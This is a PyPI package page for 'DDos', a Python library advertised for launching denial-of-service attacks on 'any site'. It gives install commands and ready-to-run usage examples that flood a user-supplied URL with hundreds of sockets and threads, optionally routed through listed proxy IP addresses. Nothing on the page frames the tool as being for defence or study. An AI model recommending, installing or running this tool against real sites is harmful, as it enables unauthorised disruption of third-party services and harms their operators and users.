Skip to main content

DDos any site

Project description

DDos

DDos any site using python

Install

From Pypi

pip3 install DDos

From GitHub

pip3 install git+https://github.com/donno2048/DDos

Usage

GUI

To use it just run:

DDos

or

ddos

in the terminal to launch the GUI (tkinter is a requirement for the GUI so use: sudo apt-get update && sudo apt-get install python3-tk -y on linux and on Windows it's already installed)

TUI

To use the text-based user interface see this python example:

from DDos import checkUrl, DDos # import the needed functions
while True:
    url = input("Give me a URL: ") # get a url from the user
    if checkUrl(url): break # if it's formatted correctly exit the loop
    else: print("This URL isn't formatted correctly, try again") # else, go back
DDos(url, sockets = 400, threads = 10, use_proxies = True) # ddos this url with 400 sockets and 10 threads and use the built-it proxies

or simply:

from DDos import DDos
DDos(input("Give me a URL: ")) # if the url isn't formatted correctly it will have an assertion error, use 500 sockets and 10 threads, no proxies will be used

The DDos function has also a custom_proxies optional variable and there is a checkProxy function, you can use them like so:

from DDos import DDos, checkProxy
assert checkProxy("109.237.91.155:8080")
assert checkProxy("178.128.37.176:80")
DDos(input("Give me a URL: "), use_proxies = True, custom_proxies = ["109.237.91.155:8080", "178.128.37.176:80"])

If you give an invalid proxy you will get an assertion error.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

DDos-1.0.2.tar.gz (5.8 kB view details)

Uploaded Source

Built Distribution

DDos-1.0.2-py3-none-any.whl (7.0 kB view details)

Uploaded Python 3

File details

Details for the file DDos-1.0.2.tar.gz.

File metadata

  • Download URL: DDos-1.0.2.tar.gz
  • Upload date:
  • Size: 5.8 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.4.1 importlib_metadata/4.0.1 pkginfo/1.7.0 requests/2.25.1 requests-toolbelt/0.9.1 tqdm/4.60.0 CPython/3.9.4

File hashes

Hashes for DDos-1.0.2.tar.gz
Algorithm Hash digest
SHA256 54a108089433ced0ed399f375a7ed284c702e9fe0e6f4c073c91d42bbed3315b
MD5 437a96984d434804e908835fed20e4d1
BLAKE2b-256 4fbe7322f6f917955a0d81a4d46e9f785e559d0f57215c319172927bffb09e20

See more details on using hashes here.

File details

Details for the file DDos-1.0.2-py3-none-any.whl.

File metadata

  • Download URL: DDos-1.0.2-py3-none-any.whl
  • Upload date:
  • Size: 7.0 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.4.1 importlib_metadata/4.0.1 pkginfo/1.7.0 requests/2.25.1 requests-toolbelt/0.9.1 tqdm/4.60.0 CPython/3.9.4

File hashes

Hashes for DDos-1.0.2-py3-none-any.whl
Algorithm Hash digest
SHA256 71b7ba09fedde3b09e51a6a3f9c698b7a979c61af6c1e05015f3019ab01781a3
MD5 518316b8107e867339268dcb4a03ed53
BLAKE2b-256 efc1ccae4ca6b92d78f695a544f7af1813c2e2526a39bcd68c12eff7b2e329f3

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page